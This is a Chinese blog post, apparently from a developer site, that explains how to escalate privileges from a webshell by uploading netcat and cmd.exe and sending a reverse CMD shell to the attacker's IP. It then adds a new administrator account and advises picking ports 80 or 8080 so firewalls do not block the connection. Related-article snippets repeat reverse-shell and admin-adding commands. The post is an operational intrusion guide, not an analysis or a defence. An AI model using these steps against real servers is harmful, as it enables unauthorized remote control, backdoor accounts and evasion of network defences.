NC反弹CMDSHELL提权总结

最新推荐文章于 2024-03-14 16:59:52 发布
最新推荐文章于 2024-03-14 16:59:52 发布
阅读量549 收藏 1
点赞数
文章标签: shell

Server-U等都不可以用的情况下.   一般都可思考用此方法
不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口…   那么这种方法也失效了….

1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)
web目录都是有写有读的权限,我们直接传NC进去

 

2:然后本地执行nc -vv -lp 52进行反弹

 

3:在shell命令下执行
F:\wwwroot\img\nc.exe  -e cmd上传路径  IP(外网IP)  52(这里是本机端口)

 

4:在shell里执行命令后,马上看到本地CMS里已经反弹上去了,执行net user 也是成功.

 

5:直接添加用户,然后远程去连接!

 

看到添加成功,也设置为管理组了!接下来直接远程连接就OK!​

 

 

不少人NC提权没有成功过,因为其中的原因是你没有降低权限,而导致了NC提权失败

失败总结:

1.反弹端口

网上不少文章写 反弹端口445 110 什么的,你当防火墙白痴是不是,我建议看一下端口有没有8080端口,如果没有8080端口的话,要反弹8080
端口,这样被防火墙阻止的概率较小

2.降低运行权限

1.现在本地监听一个端口

nc -vv -l -p 8080 //最好是80或8080这样的端口,被防火墙拦截的几率很小。

2.在WebShell运行下面命令连接我们监听的端口得到CmdShell:

nc -vv IP 8080 -e C:\Documents and Settings\All Users\Documents\cmd.exe //假设cmd.exe是上传在"C:\Documents and Settings\All
Users\Documents\"这个目录

 

weixin_34404393
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
NC反弹shell的几种方法
qq_59350385的博客
05-12 9555
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash
nc的基本操作和反弹shell
sweetie 的博客
05-09 8694
一、nc简介 nc 在网络工具中有“瑞士军刀”美誉 ,所做的就是在两台电脑之间建立链接,并返回两个数据流。 可运行在TCP或者UDP模式,添加参数 ----u 则调整为UDP,默认为TCP 即可用在windows系统也可在linux系统,也可作用于二者之间,只是对应的命令有些差异。 二、nc常用参数 -l 开启监听 -p 指定一个端口 -v 显示详细输出 -e 指定对应的应用程序 -n nc不要DNS反向查询IP的域名 -z 连接成功后立即关闭连接 三、建立C-S连接 1 环境
NC(瑞士军刀)反弹shell使用教程,实操演示,保姆级教学
最新发布
2301_79015613的博客
03-14 1116
简介:nc瑞士军刀,通常被称为netcat或简称nc,是一个被誉为网络安全界的“瑞士军刀”的实用工具。它利用TCP或UDP协议的网络连接来读写数据,具有多种强大的功能,使用也相对简单,只需两台装有nc的PC,就可以进行各种网络操作。例如,通过监听特定端口,可以实现电子取证PC与电子取证设备之间的通信和数据同步。下面是nc的常用参数。
【安全知识】——LInux的shell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 5923
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
mysql反弹提权_MySQL数据库反弹端口连接提权
weixin_42545292的博客
01-19 705
【51CTO.com原创稿件】在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令。在一般的情况下,也就放弃了。但其实可以换一种思路,通过mysql查询来直接提权,可以针对以下场景:(1)通过网站无法获取webshell(2)Webshell无法执行命令(3)有phpmyadmin和root账号,无法查询或者无法获取网...
利用nc反弹cmdshell提权
01-27
利用nc反弹cmdshell提权 利用nc反弹cmdshell提权 利用nc反弹cmdshell提权
NC反弹CMD.EXE
04-20
NC反弹CMD
NC_SHELL反弹提权.rar
05-09
,NC_SHELL反弹提权.
Linux下NC反弹shell命令(推荐)
09-15
本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作,并提供其他编程语言的反弹Shell命令作为参考。 首先,攻击者需要在自己的机器上启动一个监听服务来接收目标机器的连接。这通常通过以下`nc`命令完成: ...
详解NC反弹shell的几种方法
01-08
最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell...
ncCMD绑定功能
09-24
nc 不想多说,带CMD绑定功能的 nc 不想多说,带CMD绑定功能的
NC提权详细教程
12-04
NC提权 详细教程附带CMD命令 NC反弹 然后进行查看端口 netstat -an 进行连接 cd\ cd 360rec quert user C:\360Rec\churrasco.exe "logoff id" churrasco.exe "net user yuqing1453 4520829 /add" churrasco.exe "net localgroup administrators add /add" 首先执行命令 CMD。EXE 现在来执行NC命令 连接 本地远程访问反弹 就用这个吧~~ 换一个 命令成功完成。 这个YUQING1453是我之前的 命令成功完成。
打开监听端口失败_LCX端口转发及NC反弹
weixin_26833939的博客
01-26 1125
真理的蜡烛往往会烧伤那些举烛的人的手 —— 布埃斯特环境攻击机 kali linux(IP:192.168.96.128)靶机:win7专业版(IP:192.168.96.130)公网服务器:centos(IP:就不说了,原因如下)工具 lcx :windows版是lcx.exe Linux版是portmap nc.exe工具地址:https://pan.baidu.com/s/19Lm3H4B...
nc教程---很经典的工具(菜鸟进阶篇)
weixin_33743880的博客
11-15 2352
######################################################################1. Netcat 1.10 for NT - nc11nt.zip######################################################################Basi...
NC工具的使用说明教程
热门推荐
xysoul的专栏
08-21 8万+
nc的使用方法 netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。  在中国,它
nc监控实现调用受害者cmd
08-17 202
正向连接 受害者 IP 是直接暴漏在公网的 或者你们同属于一个内网 受害者:nc.exe -vlp 1234 -e cmd.exe 攻击者 nc 192.168.1.1 1234 nc -lvvp 80 直接监听内网所有主机80端口 反向连接 受害者 A 出于内网状态 192.168.1.25 攻击者 B 出于内网-外网的服务器 202.12.178.22 受害者 nc....
php大马如何使用nc反弹提权,使用NC反弹Shell
weixin_39913628的博客
03-13 362
今日中午有某牛牛问我如何使用NC反弹shell当时真是冷汗直冒!哎,郁闷,正好此时有空就写出来供某牛牛和小菜们学习一下!使用NC反弹Shell在进行Shell反弹时,有时会碰到服务器不支持PHP或者WebShell无法成功反弹Shell的情况,例如有的服务器只支持JSP,不支持PHP。此时,可以同样采用Windows下的经典的NC反弹Shell方法。在Windows下反弹CmdShell时,首先...
Netcat瑞士军刀的简单使用
谢公子的博客
11-15 2868
目录 Netcat 常用参数: 常见的用法: 端口扫描: 聊天 文件传输 反弹shell 蜜罐 Netcat Netcat常称为 nc,拥有“瑞士军刀”的美誉。nc 小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具,能被其它的程序或脚本直接驱动。同时,它又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思...
[pwn]遇到不会的题不要急要一步步分析(和请教大佬)
Breeze的博客
12-31 9407
遇到不会的题要一步步分析(和请教大佬) 文章目录遇到不会的题要一步步分析(和请教大佬)拿到题目,没见过的船新题型传统方法简单分析并不能解决询问大腿github找到部分源码思路突破新工具完成逻辑交互程序逻辑利用思路 拿到题目,没见过的船新题型 公司内部比赛试题 一拿到题目,发现压缩包并不简单,怎么还有个奇怪的东西混进来了。于是解压之后直接打开这个奇怪的东西,发现并看不懂: 什么鬼东西花里胡哨的,先...
NC 反弹shell
08-30
NC反弹shell是一种利用NetCat工具实现的一种技术,用于在目标机器和控制机器之间建立一个反向连接,并获得对目标机器的控制权。在反弹shell中,目标机器先执行NC命令,将shell连接到控制机器上的NC监听端口,从而使...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值